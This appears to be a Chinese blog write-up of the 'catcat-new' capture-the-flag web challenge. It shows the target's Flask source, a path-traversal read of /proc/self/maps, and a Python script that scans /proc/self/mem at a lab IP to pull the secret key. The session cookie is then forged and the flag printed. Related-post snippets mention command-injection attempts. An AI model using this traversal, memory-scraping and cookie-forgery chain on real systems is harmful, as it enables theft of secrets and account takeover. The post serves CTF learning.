攻防世界 catcat-new

最新推荐文章于 2024-04-05 09:30:31 发布
最新推荐文章于 2024-04-05 09:30:31 发布
阅读量576 收藏 11
点赞数 10
文章标签: python 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73673698/article/details/136988664
版权

参考文章:(建议去看大佬的文章,我觉得大佬写的挺易懂)攻防世界-cat_cat_new(flask_session伪造、/proc/self/文件夹) - 你呀你~ - 博客园 (cnblogs.com)

打开页面后随便点击一个图片,发现url使用GET方式传递了一个名为file的参数,怀疑可能存在文件包含漏洞。

使用wappalyzer插件可以看出flask框架,由python编写的

下面我们去读取app.py文件,去查看内容。

复制下来内容,美化一下会好看一些。

import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat

flag = ""
app = Flask(
	__name__,
	static_url_path='/', 
	static_folder='static' 
)
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh" 
 # 此处利用uuid.uuid4()生成了一串id字符串并在后面拼接*abcdefgh
if os.path.isfile("/flag"):
	flag = cat("/flag")
	os.remove("/flag") 

@app.route('/', methods=['GET'])
def index():
	detailtxt = os.listdir('./details/')
	cats_list = []
	for i in detailtxt:
		cats_list.append(i[:i.index('.')])
	
	return render_template("index.html", cats_list=cats_list, cat=cat)



@app.route('/info', methods=["GET", 'POST'])
def info():
	filename = "./details/" + request.args.get('file', "")
	start = request.args.get('start', "0")
	end = request.args.get('end', "0")
	name = request.args.get('file', "")[:request.args.get('file', "").index('.')]
	
	return render_template("detail.html", catname=name, info=cat(filename, start, end)) 
 

@app.route('/admin', methods=["GET"]) # 在session信息中admin=1的用户在/admin路径下访问网站可以获得flag,所以要伪造session。
def admin_can_list_root():
	if session.get('admin') == 1:
		return flag
	else:
		session['admin'] = 0
		return "NoNoNo"


if __name__ == '__main__':
	app.run(host='0.0.0.0', debug=False, port=5637)

flask_session的伪造需要用到secret_key,而secret_key的值可以通过内存数据获取。在读取内存数据文件/proc/self/mem之前,我们要先读取/proc/self/maps文件获取可读内容的内存映射地址。?file=../../../proc/self/maps,将maps文件返回的内容保存到test.txt中,用脚本去得到secret_key。

脚本是来自大佬的博客:(菜鸡不会自己写   攻防世界-cat_cat_new(flask_session伪造、/proc/self/文件夹) - 你呀你~ - 博客园 (cnblogs.com)

import re
import requests

maps=open('test.txt')
b = maps.read()
list = b.split('\\n')
for line in list:
    if 'rw' in line:
        addr = re.search('([0-9a-f]+)-([0-9a-f]+)',line)
        #正则匹配地址,地址格式为十六进制数[0-9a-f],reserch会返回一个re.Match对象,用括号括起来是为了使用group()处理返回结果。
        start = int(addr.group(1),16)  #将十六进制字符转化为十进制数,为了符合start参数格式参考链接
        end = int(addr.group(2),16)    #将十六进制字符转化为十进制数,为了符合end参数格式
        print(start,end)
        url = f"http://61.147.171.105:63646/info?file=../../../proc/self/mem&start={start}&end={end}"
        #使用start和end参数读取mem
        response = requests.get(url)
        secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", response.text)  #uuid4()生成的字符串除去-符号后为固定的32字节(128bit),find
        if secret_key:
            print(secret_key)
            break

 

记得要改一下url啊,不然只能像我这个笨比一样等半天(bushi),拿到secret_key之后我们去伪造session。这里附上github上工具的地址:GitHub - noraj/flask-session-cookie-manager: :cookie: Flask Session Cookie Decoder/Encoder

 先来解密一下session,可以看到是{'admin': 0}:

我们先改成{'admin': 1},再加密得到一个新的session:

 bp抓包伪造session,得到flag

catctf{Catch_the_c4t_HaHa} 

Sleep`
关注
  • 10
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
攻防世界-Cat
qq_44065556的博客
09-29 3600
进入环境出现的页面是一个输入框,然后让我们输入域名 我们顺着思路输入一个域名试一试 并没有任何的回显内容 想一想,如果输入127.0.0.1会怎么样? 它执行了一个ping命令,那么就会联想到会不会有命令拼接 在框中输入 127.0.0.1 & ls 127.0.0.1 | ls 显示无效的url,应该是被过滤掉了,burp抓一抓,跑一跑看看哪个字符没有被过滤 发现@符号没有被过滤,这有什么用呢,开始思考.没有特别好的思路,这个时候就要脑洞大一点,各种尝试了...
CAT猫.zip猫.zip
12-05
CAT猫.zip猫.zip猫.zip猫.zip猫.zip猫.猫.zipzip
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界encode杂项
11-20
攻防世界encode杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947807
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952541
攻防世界catcat-new
最新发布
2302_79800344的博客
04-05 888
【代码】【攻防世界catcat-new
攻防世界catcat-new
Fightever_的博客
10-24 1102
不过读/proc/self/mem前要注意,/proc/self/mem内容较多而且存在不可读写部分,直接读取会导致程序崩溃,因此需要搭配/proc/self/maps获取堆栈分布,结合maps的映射信息来确定读的偏移值.大佬读取/proc/self/maps+/proc/self/mem+SECRET_KEY的脚本,可一键获取flag.# 由/proc/self/maps获取可读写的内存地址,再根据这些地址读取/proc/self/mem来获取secret key。,用于获取当前启动进程的完整命令。
攻防世界Check杂项
11-20
攻防世界Check杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952250
import.rb:代替Kernel.require
04-28
import ( './cat' ) :: Catcat . new . meow # => meow meow# Cat # => uninitialized constant Cat (NameError)发展签出仓库后,运行bin/setup来安装依赖项。 您也可以运行bin/console进行交互式提示,以进行实验...
utilite:在 Utilite 上启动 Fedora 21 的补丁和说明
06-06
如果从 github 查看器复制,则 setenv catcat 不起作用。 注意:在图形图像上从串行控制台设置 root 密码可能会出现问题。 如果发生这种情况,您可能需要将 sd 卡安装在桌面上并将哈希添加到 /etc/shadow,或者对 ...
XCTF-Web-catcat-new
weixin_45723896的博客
06-26 2056
proc/self/mem是当前进程的内存内容,通过修改该文件相当于直接修改当前进程的内存数据。file=../../../../proc/self/cmdline,发现有一个通过python启动app.py的命令。通过/proc/PID可以访问对应PID的进程内核数据,而/proc/self访问的是当前进程的内核数据。先读取/proc/self/maps文件获取可读内容的内存映射地址。/proc/self/maps包含的内容是当前进程的内存映射关系,可通过读取该文件来得到内存数据映射的地址。
攻防世界-Cat-(详细操作)做题笔记
qq_43715020的博客
06-24 4887
攻防世界-Cat-(详细操作)做题笔记
攻防世界】二十 --- Cat --- Django框架
qq_43168364的博客
12-29 1148
啊大大如哈的任何
攻防世界catcat-new
qq_45955869的博客
05-28 1398
攻防世界catcat-new
攻防世界Cat
qq_46230755的博客
01-11 617
打开后有个输入框简单测试一下 题目提醒了cat那感觉大概率就是要cat /flag了 试了一些简单的姿势发现都被过滤了 观察一下发现可以修改url 会进行自动的解码,于是尝试输入%80发现出现了网页源码 复制后新建一个html进行打开 没什么思路,看了别的师傅的wp,发现原来题目有提示 RTFM of PHP CURL===>>read the fuck manul of PHP CURL??? 然后别的师傅说了 我们使用@进行文件传递,对文件进行读取之后还会把内容传给url参
el-option change
09-06
引中提到了在使用Vue的element-UI库中的select组件时,如果将select放在循环中,可能会遇到触发change事件时无法正确传递被选中项的值和索引的问题。而引用中提到了一个具体的实例,需要根据选择的证书类别来设置证书编号的前缀。最初尝试使用el-select的@change事件来解决,但却多次输出undefined,最终通过改变思路,使用el-option的@click.native原生方法来实现。引用中则给出了一段相关的代码片段。 根据这些引用内容,可以得出el-option组件的change事件无法直接解决问题,因此需要使用其他方法来实现需求。在这个具体的例子中,使用了el-option的@click.native原生方法来实现根据选择的证书类别来设置证书编号的前缀。这样当选择了某个证书类别时,会触发el-option的点击事件,然后通过该事件来改变相应的状态。 综上所述,el-option的change事件无法直接解决问题,需要使用其他方法来实现。在这个例子中,使用了el-option的@click.native事件来实现需求。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [element-ui组件中input等的change事件中传递自定义参数](https://download.csdn.net/download/weixin_38606294/13975651)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vue element-UI使用el-select时@change不能触发的解决方案(通过el-option @click.native原生方法)](https://blog.csdn.net/moshowgame/article/details/109151478)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vue + Element-ui的下拉框el-select获取额外参数详解](https://download.csdn.net/download/weixin_38697471/13965857)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值